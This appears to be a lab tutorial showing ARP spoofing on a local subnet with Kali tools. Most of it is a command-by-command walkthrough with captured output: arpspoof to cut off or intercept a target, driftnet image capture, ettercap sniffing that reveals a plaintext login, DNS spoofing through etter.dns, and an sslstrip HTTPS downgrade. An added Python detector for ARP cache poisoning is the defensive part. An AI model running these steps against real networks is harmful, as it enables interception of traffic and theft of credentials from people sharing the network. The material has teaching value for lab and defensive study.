Purpose:
An ARP attack is an attack technique aimed at the Ethernet Address Resolution Protocol (ARP). It lets an attacker obtain, and even tamper with, packets on the local network, and can stop specific computers or every computer on the network from connecting normally; in this way the attacker can cut a target host or phone off the network, intercept images, sniff passwords, and so on.
The following is a lab experiment carried out inside a local network: Kali's penetration-testing tools are used to perform ARP spoofing and traffic sniffing against PCs and phones in the same subnet (on the same Wi-Fi).
Principle:
ARP spoofing works by forging IP and MAC addresses. It can generate large volumes of ARP traffic that congest the network, and as long as the attacker keeps sending forged ARP replies, the IP-MAC entries in the target host's ARP cache are overwritten.
If one computer in the LAN is infected with an ARP trojan, the infected system will try to intercept the communications of the other computers on the network by means of ARP spoofing, causing communication failures for those computers.
Steps:
Open Kali and use the following tools for the penetration test.
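The defender's view of the mechanism just described, as an added example that is not part of the original lab notes: a small detector that learns IP-to-MAC bindings from observed ARP replies, pins the gateway's MAC the way an administrator would, and raises an alert when a reply conflicts with a known binding or when replies for one IP arrive in a burst. The gateway and attacker MAC addresses and the reply records are constructed for illustration.

```python
"""ARP cache poisoning detector over a stream of observed ARP replies."""
from collections import defaultdict, deque

# Static gateway binding, pinned the way an administrator would (constructed MAC).
PINNED = {"192.168.80.2": "00:50:56:aa:bb:cc"}


def detect_arp_spoof(replies, pinned=PINNED, window_s=2.0, flood_threshold=5):
    """replies: iterable of (timestamp_s, sender_ip, sender_mac) taken from ARP replies.

    Returns a list of (kind, ip, mac) alerts: 'conflict' when the sender MAC
    differs from the binding already recorded for that IP, 'flood' (once per
    burst) when more than flood_threshold replies for one IP fall inside window_s.
    """
    table = dict(pinned)            # IP -> MAC the detector trusts
    recent = defaultdict(deque)     # IP -> timestamps inside the window
    flooded = set()                 # IPs for which a flood alert is already open
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = table.get(ip)
        if known is None:
            table[ip] = mac         # first sighting of this IP: learn the binding
        elif known != mac:
            alerts.append(("conflict", ip, mac))
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop replies that left the window
            q.popleft()
        if len(q) >= flood_threshold and ip not in flooded:
            flooded.add(ip)
            alerts.append(("flood", ip, mac))
        elif len(q) < flood_threshold:
            flooded.discard(ip)
    return alerts


# Constructed sample: one genuine gateway reply, one reply from the victim PC
# (MAC as in the nmap output of this lab), then a burst of forged replies in
# which the attacker (constructed MAC) claims the gateway's IP.
SAMPLE_REPLIES = [
    (0.0, "192.168.80.2", "00:50:56:aa:bb:cc"),
    (0.5, "192.168.80.128", "00:0C:29:81:14:B7"),
    (1.0, "192.168.80.2", "00:0c:29:de:ad:01"),
    (1.2, "192.168.80.2", "00:0c:29:de:ad:01"),
    (1.4, "192.168.80.2", "00:0c:29:de:ad:01"),
    (1.6, "192.168.80.2", "00:0c:29:de:ad:01"),
    (1.8, "192.168.80.2", "00:0c:29:de:ad:01"),
]

if __name__ == "__main__":
    for kind, ip, mac in detect_arp_spoof(SAMPLE_REPLIES):
        print(f"{kind}: {ip} claimed by {mac}")
```

On a real host the same logic would be fed from a packet capture filtered to ARP replies (opcode 2); a static ARP entry for the gateway or Dynamic ARP Inspection on the switch is the corresponding mitigation.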
ARP denial of network access
sudo -i
ifconfig # look up the attacker machine's subnet and IP; in this experiment 192.168.80.131
# find the local gateway: 192.168.80.2
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.80.2 0.0.0.0 UG 100 0 0 eth0
192.168.80.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
fping -g 192.168.80.0/24 # discover the IP addresses of target hosts in the same subnet
192.168.80.2 is alive # gateway
192.168.80.128 is alive # target host
192.168.80.131 is alive # Kali host
# or
nmap 192.168.80.0/24 -sS -sV
Nmap scan report for 192.168.80.128
Host is up (0.00022s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open tcpwrapped
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:81:14:B7 (VMware)
Service Info: Host: CLIENT-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
# ARP attack
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2 # eth0 = interface, 80.128 = target host IP, 80.2 = gateway


ARP spoofing: capturing web browser images
echo 1 > /proc/sys/net/ipv4/ip_forward # enable IP forwarding so the target's traffic is still relayed to the gateway
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
driftnet -i eth0

Capturing HTTP credentials
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
ettercap -Tq -i eth0
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
# captured plaintext username and password
HTTP : 120.131.6.130:80 -> USER: PASS: 23456 INFO: http://v3.chaoxing.com/toJcLogin
CONTENT: userNumber=23456&passWord=23456&source=1
# graphical interface
ettercap -G

DNS spoofing
ifconfig # check this machine's IP (192.168.80.131)
echo www.baidu.com A 192.168.80.131 > /etc/ettercap/etter.dns # point the Baidu DNS record at the Kali host
arpspoof -i eth0 -t 192.168.80.128 192.168.80.2
/etc/init.d/apache2 start # start the Apache service

Capturing HTTPS credentials
nano /etc/ettercap/etter.conf
Uncomment the following four lines:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dpo>
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dp>
# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -d %destination --d>
redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -d %destination -->
# use sslstrip to downgrade HTTPS to HTTP
sslstrip -a -f -k
ettercap -Tq -i eth0
# the following output is obtained
HTTP : 180.101.49.186:443 -> USER: test PASS: cKbxLsHxtoI350cNJnKC4UlsvnmrRIvxdhhken6TpjUtQ7v2yfo51dNHJxFRy2rtReD8RFGWNExHfez1um9B4Fz9OCxcni/60P1XXgFP31eN8Uovge+70eHxoDbEe7/jnclXK1YrRojtXGwuKyxbEGEM6bgC55XETNcCXhlkToE= INFO: https://tieba.baidu.com/
CONTENT: staticpage=http%3A%2F%2Ftieba.baidu.com%2Ftb%2Fstatic-common%2Fhtml%2Fpass%2Fv3Jump.html&charset=GBK&token=43d8213010ab7a1cc8b670f6ebb5664a&tpl=tb&subpro=&apiver=v3&tt=1687096799094&codestring=&safeflg=0&u=https%3A%2F%2Ftieba.baidu.com%2F&isPhone=&detect=1&gid=DE3DB68-7267-409B-A932-4A13C9C68028&quick_user=0&logintype=dialogLogin&logLoginType=pc_loginDialog&idc=&loginmerge=true&mkey=&splogin=rate&username=test&password=cKbxLsHxtoI350cNJnKC4UlsvnmrRIvxdhhken6TpjUtQ7v2yfo51dNHJxFRy2rtReD8RFGWNExHfez1um9B4Fz9OCxcni%2F60P1XXgFP31eN8Uovge%2B70eHxoDbEe7%2FjnclXK1YrRojtXGwuKyxbEGEM6bgC55XETNcCXhlkToE%3D&mem_pass=on&rsakey=AfElnSJL2pgiuRyFjZ1AEC8lW5rzfGBQ&crypttype=12&ppui_logintime=313563&countrycode=&fp_uid=&fp_info=&loginversion=v4&supportdv=1&bdint_sync_cookie=&ds=nozYvA2%2BnefGXV6T%2FRfk3J9Nsm6%2BST8dWCjvO5ltCG7p1q0izYmL%2F3U9l17xPVjmSasq7N9y9y0ezzCMl90OLEN%2F5zc350ViWZA2qq2E9z6fFmzWEOTZ7dNs%2BsP%2BhnCWVrAWBYzqY9BdeTJBadDoIuSXDdONU62nuiNkTvIJWUcgrZjQdBn6tKN23VBdm9CqfVOtuM1lVTcdvpb4AK93Of4dxtFnPsmyv3%2FeNZb1KuSpp

